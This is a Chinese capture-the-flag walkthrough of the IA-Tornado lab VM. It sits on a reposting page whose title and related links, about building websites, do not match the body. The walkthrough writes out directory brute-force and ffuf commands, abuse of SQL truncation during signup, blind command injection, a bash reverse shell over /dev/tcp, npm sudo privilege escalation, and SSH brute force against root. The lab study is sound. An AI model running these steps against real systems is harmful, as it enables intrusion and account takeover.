如何建立一个外贸公司网站网站开发流程 原型设计
- 作者: 五速梦信息网
- 时间: 2026年03月21日 09:52
当前位置: 首页 > news >正文
如何建立一个外贸公司网站,网站开发流程 原型设计,鲜花网站数据库建设,厦门建站系统建设前言 靶机#xff1a;IA-Tornado#xff0c;IP地址为192.168.10.11 攻击#xff1a;kali#xff0c;IP地址为192.168.10.2 都采用虚拟机#xff0c;网卡为桥接模式 本文所用靶场、kali镜像以及相关工具#xff0c;我放置在网盘中#xff0c;可以复制后面链接查看 htt…前言 靶机IA-TornadoIP地址为192.168.10.11 攻击kaliIP地址为192.168.10.2 都采用虚拟机网卡为桥接模式 本文所用靶场、kali镜像以及相关工具我放置在网盘中可以复制后面链接查看 https://pan.quark.cn/s/8585373be449 主机发现 因为是下载靶机到本地所以是同一局域网同一网段同一网卡下所以为求速度可以使用arp-scan -l或netdiscover -r 192.168.10.1⁄24 若想要模拟真实环境可以使用nmap 信息收集 使用nmap扫描端口 网站信息探测 访问80端口默认界面发现是apachee2的默认界面查看页面源代码也未发现内容 尝试进行目录爆破 使用gobuster、dirsearch、dirb、dirbuster、ffuf等工具进行爆破 gobuster dir -u http://192.168.10.11 -w /usr/share/wordlists/dirb/big.txt -x php,html,txt,md -d -b 404,403发现一个路径bluesky其他路径无可用访问这个路径发现是一个前端页面不知道这种有没有和后端交互 哇这个界面真的很像现在大部分的网站都是前后端分离的不过这里的靶场不确定是否也是所以对这个路径再进行一次扫描可以看到还是有后端的语言php gobuster dir -u http://192.168.10.11/bluesky -w /usr/share/wordlists/dirb/big.txt -x php,html,txt,md或者借助浏览器插件wappalyzer也是可以发现编程语言的这里若是发现后就可以再使用目录爆破了 访问上面扫描出的路径通过上面也可以看到可用的路径两个一个login.php一个signup.php 访问login.php 漏洞寻找 尝试输入一些弱密码、万能密码等操作无法登录成功 再访问signup.php发现输入后会直接提示注册成功信息 以注册的信息进行访问login.php并输入注册的信息进行登录 在点击portfolio时出现下面字符说是LFI漏洞被修复了但是不要忘记再测试 其实这里点击功能点后都未发现其他的利用不过这里是php所以测试是否有隐藏传参支持本地文件包含等也就是进行爆破 这里先查看每个功能点的页面源代码在portfolio这里的页面源代码中出现敏感目录信息 这里假设不知道这个路径对每个php文件进行路径测试可以使用ffuf或wfuzz 不过这里需要先获取正在登录状态的用户的cookie才行可以直接使用浏览器查看登录的cookie 以火狐浏览器为例打开开发者工具可按f12进入 或者利用工具curl curl -X POST -d unameadminupassadminbtnLogin http://192.168.10.11/bluesky/login.php -c c.txt #-X选择请求方式这里可以在查看页面源代码处发现表单提交是POST #-d 是POST请求体中的数据这里的数据形式可以借助浏览器中开发者工具其中的网络模块可以发现请求形式 #-c 把cookie保存在当前目录的c.txt文档中查看c.txt即可发现cookie的名称以及值 这里获取到cookie了那么为什么确定cookie才可以呢这里以ffuf为例查看返回 ffuf -c -w /usr/share/wordlists/dirb/big.txt -u http://192.168.10.11/bluesky/port.php #这是未设置爆破时的并且未给予cookie上面的返回与目录爆破时一样都是要302跳转的。 再以添加cookie后的返回为对比 ffuf -c -w /usr/share/wordlists/dirb/big.txt -u http://192.168.10.11/bluesky/port.php -H Cookie:PHPSESSIDkmpfqldt8iqc6ps0cfklotvglv可以看到指定cookie后就可以直接访问了所以这也是以cookie做身份验证的 那么尝试使用ffuf进行测试当然使用burp抓包爆破就通过数据包直接爆破即可因为请求数据包中含有登录的cookie信息 不过这里字典跑了很久并未获取到任何传参等信息并且登录后的几个php都测试了 ffuf -c -w /usr/share/wordlists/dirb/common.txt:FUZZ1 -w /usr/share/wordlists/wfuzz/Injections/Traversal.txt:FUZZ2 -u http://192.168.10.11/bluesky/port.php?FUZZ1FUZZ2 -H Cookie:PHPSESSIDkmpfqldt8iqc6ps0cfklotvglv -fs 2205ffuf -c -w /usr/share/wordlists/dirb/big.txt -u http://192.168.10.11/bluesky/port.php?FUZZ/home/tornado/imp.txt -H Cookie:PHPSESSIDkmpfqldt8iqc6ps0cfklotvglv -fs 2205啧已知的信息大概就这么多这里难道不是通过传参进行文件包含的吗 给出的路径/home/tornado/imp.txt 信息泄露 分析这个路径一般/home是存放用户的家目录而其目录下的一般都是用户就假设这里的路径就是家目录。表示存在用户tornado。那么之前nmap扫描的时候目标为linux是否可以确定这个路径具有多种表现方式 /home/tornado/imp.txt ~/imp.txt #这里表示当前用户家目录下的imp.txt ~tornado/imp.txt #这里表示用户tornado家目录下的imp.txt #一般 ~ 后加用户名表示某用户的家目录分析来看一般网站的用户都是www-data并且主目录不是在/home的并且这里测试php文件有无传参并未发现说明确实修复了 不过假设不通过传参呢直接通过网址进行访问进行测试 当前的网址路径有两个其余可以直接看到的无意义 http://192.168.10.11 http://192.168.10.11/bluesky把这两个url与上面三个路径进行组合 http://192.168.10.11/home/tornado/imp.txt http://192.168.10.11/~/imp.txt http://192.168.10.11/~tornado/imp.txt http://192.168.10.11/bluesky/home/tornado/imp.txt http://192.168.10.11/bluesky/~/imp.txt http://192.168.10.11/bluesky/~tornado/imp.txt然后使用ffuf测试哪些有返回 发现url中http://192.168.10.11/~tornado/imp.txt有返回访问查看发现全是邮箱地址 之前在进行登录的时候用户名处就是邮箱测试这些用户名是否存在 ceotornado ctotornado managertornado hrtornado lfitornado admintornado jacobtornado ittornado salestornado在signup.php这里可以测试是否存在不存在就会像之前一样提示注册成功 使用burp抓取注册时的数据包然后进行爆破 攻击成功后进行查看因为这里使用的是burp社区版所以不能直接进行搜索结果不过可以在设置中配置匹配这里用户已注册会返回User already registered以这个进行匹配就可以清晰的看清了 这里去网站看了一下这个13是指长度不过这里长度限制是在表单输入和我通过抓包修改有什么关系我已经不受表单控制了 其实主要是观察这三个账户 admintornado jacobtornado hrtornado不过前面既然注册了使用burp再验证一下奇怪的点出现了前面manager注册成功的这里确登录不了 分析为sql截断 前往浏览器进行手工测试发现长度限制那么前面注册的是什么分析一下在浏览器进行注册也是有长度限制的我是通过burp绕过这个前端的长度限制。 那么通过burp注册的账户到了数据库怎么处理的或者说没到数据库的时候经过什么处理了。 直接输入长度限制的账号managertorna啧登录成功了 好家伙说明这里前端的长度限制和sql是一样的或者说前端是可修改长度sql是进行截断操作 这里长度限制为13那么通过这种形式测试sql在进行截断的时候是否还进行数据库中用户的检验若没有就可以存在多个用户了尤其是空格之类的。 admintornado a jacobtornado a hrtornado a之后直接登录admintornado以及注册的密码发现直接登录成功但是查看这个功能点还是不行 再换一个注册jacobtornado a然后以jacobtornado登录好嘛这里可以看到了 发现这里输入什么就会返回什么这不就是很好的xss吗但是这里要xss还有什么用吗都已经登录了尝试试试输入一些命令看其能否执行 命令注入 经过测试输入id、ls等直接返回这些字符不过我这里测试一下ping的时候发现问题。 我刚开始直接输入ping 127.0.0.1因为是linux界面所以一直在加载那么大概就清楚了。然后我把靶机重启了然后重新验证只发送5个包ping -c 127.0.0.1发现真的有变化确定是可以执行命令只是不把回显返回 尝试进行shell反弹先在kali中使用nc开启监听9999端口然后输入下面命令并执行 /bin/bash -c bash -i /dev/tcp/192.168.10.2⁄9999 01提权 提权至catchme用户 使用find寻找具有SUID权限的文件发现sudo直接尝试发现不需要密码有一个用户catchme的文件可执行 find / -perm -4000 -print 2/dev/null对于不知道npm的sudo提权可以查看网站gtfobins.github.io中的帮助 TF\((mktemp -d) echo {scripts: {preinstall: /bin/sh}} \)TF/package.json chmod 777 tmp.Veh2PZ0bMR sudo -u catchme npm -C $TF –unsafe-perm i使用dpkg查看python版本然后使用python获取交互式界面 dpkg -l | grep python python3 -c import pty;pty.spawn(/bin/bash)提权至root用户 查看这个用户的家目录 把代码中已经加密的那一串尝试进行分析因为执行过这个脚本发现不知道输入什么字符加密了。 不过这里可以通过源代码给进行反写不会写代码就直接丢给ai这里可以提供代码 import string# 待解密的加密字符串 encrypted_text hcjqnnsotrrwnqcfor key in string.printable:if len(key) 1:continues abcdefghijklmnopqrstuvwxyzs s.replace(key, )s key sdecrypted_text for n in encrypted_text:j ord(n)if j ord(key):j ord(a)decrypted_text chr(j)elif n a and n key:j j 1decrypted_text chr(j)elif n key:decrypted_text nelif ord(n) 32:decrypted_text chr(32)elif j 48 and j 57:decrypted_text chr(j)elif j 33 and j 47:decrypted_text chr(j)elif j 58 and j 64:decrypted_text chr(j)elif j 91 and j 96:decrypted_text chr(j)elif j 123 and j 126:decrypted_text chr(j)print(decrypted_text)然后执行这个脚本把结果重定向到一个文件中 其实数据不多查看一下就发现一个引人idkrootpassword 把结果进行一个ssh爆破针对root因为已知的两个用户都用过了 查看最终文件 总结 该靶机主要考察以下几点 对于网站路径以及本地文件包含的注入点测试对于linux中~表示什么意思以及~用户表示什么意思以及/home是存放什么的对于sql截断注入的了解要测试后才能知道这里就是观察到注册成功但是无法成功登录的情况进行具体分析对于输入框输入什么返回什么若是未登录状态使用xss可行当然实际情况中若是真有可以构造链接发送给别人。这里是要获取shell所以测试命令注入方面。虽然没有回显但是在执行需要时间的命令时明显发现是可执行命令的对于sudo提权的一些方法这里是npm对于python代码或者能获取到关键信息也行现在ai发展迅速可以通过ai直接写出逆向解密的代码
相关文章
-
如何建立一个手机网站网站建设费用应按几年摊销
如何建立一个手机网站网站建设费用应按几年摊销
- 技术栈
- 2026年03月21日
-
如何建立一个好的网站邮箱注册申请官网
如何建立一个好的网站邮箱注册申请官网
- 技术栈
- 2026年03月21日
-
如何建立学校网站以下哪个选项不属于网络营销的特点
如何建立学校网站以下哪个选项不属于网络营销的特点
- 技术栈
- 2026年03月21日
-
如何建立一个网站放视频免费网站访客qq统计系统
如何建立一个网站放视频免费网站访客qq统计系统
- 技术栈
- 2026年03月21日
-
如何建立一个网站根目录互联网网站开发
如何建立一个网站根目录互联网网站开发
- 技术栈
- 2026年03月21日
-
如何建立一个网站根目录营销专业网站
如何建立一个网站根目录营销专业网站
- 技术栈
- 2026年03月21日






